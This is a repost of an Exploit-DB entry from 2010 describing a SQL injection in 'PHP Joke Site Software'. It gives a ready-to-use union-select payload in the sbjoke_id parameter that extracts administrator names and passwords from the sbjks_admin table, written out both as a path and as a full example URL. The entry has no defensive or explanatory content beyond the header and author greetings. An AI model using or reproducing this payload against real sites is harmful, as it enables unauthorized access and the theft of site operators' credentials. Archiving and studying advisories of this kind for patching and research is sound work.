PHP Joke Site Software – ‘sbjoke_id’ SQL Injection - 体验盒子

作者： h4ck3r

日期： 2010-09-01

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/14860/

[#] Title:PHP Joke Site Software (sbjoke_id) SQL Injection Vuln

[#] Link:http://www.softbizscripts.com/jokes-script-features.php

[#] Author:BorN To K!LL - h4ck3r

[#] 3xploit:

/index.php?sbjoke_id=-5592+union+all+select+1,2,3,4,concat(sbadmin_name,0x3a,sbadmin_pwd),6,7,8,9,10,11,12,13+from+sbjks_admin--

[#] 3xample:

http://www.site.com/index.php?sbjoke_id=-5592+union+all+select+1,2,3,4,concat(sbadmin_name,0x3a,sbadmin_pwd),6,7,8,9,10,11,12,13+from+sbjks_admin--

[#] Greetings:

[Dr.2] , [darkc0de team] , [AsbMay's Group] , n all ...